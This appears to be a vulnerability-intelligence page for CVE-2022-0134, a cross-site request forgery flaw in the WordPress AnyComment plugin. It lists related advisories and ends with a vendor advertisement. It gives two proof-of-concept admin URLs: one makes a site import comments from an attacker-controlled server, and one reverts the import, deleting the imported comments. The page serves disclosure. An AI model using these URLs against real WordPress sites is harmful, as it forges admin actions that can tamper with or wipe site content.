Arbitrary HyperComments Import/Revert CSRF on AnyComment < 0.2.18
Reporter | Title | Published | Views | Family All 8 |
---|---|---|---|---|
![]() | CVE-2022-0134 AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF | 21 Feb 202210:45 | – | cvelist |
![]() | AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF | 19 Jan 202200:00 | – | wpvulndb |
![]() | CVE-2022-0134 | 21 Feb 202211:15 | – | nvd |
![]() | Cross site request forgery (csrf) | 21 Feb 202211:15 | – | prion |
![]() | WordPress AnyComment plugin <= 0.2.17 - Arbitrary HyperComments Import/Revert via CSRF vulnerability | 19 Jan 202200:00 | – | patchstack |
![]() | WordPress Cross-Site Request Forgery Vulnerability (CNVD-2022-25195) | 23 Feb 202200:00 | – | cnvd |
![]() | CVE-2022-0134 | 21 Feb 202211:15 | – | cve |
![]() | Identify Server-Side Attacks Using Qualys Periscope | 1 Dec 202223:11 | – | qualysblog |
Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a get request in your server logs indicating that the import request is done.
To revert the imports (ie delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1
https://www.youtube.com/watch?v=75BH2m8cmPo
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo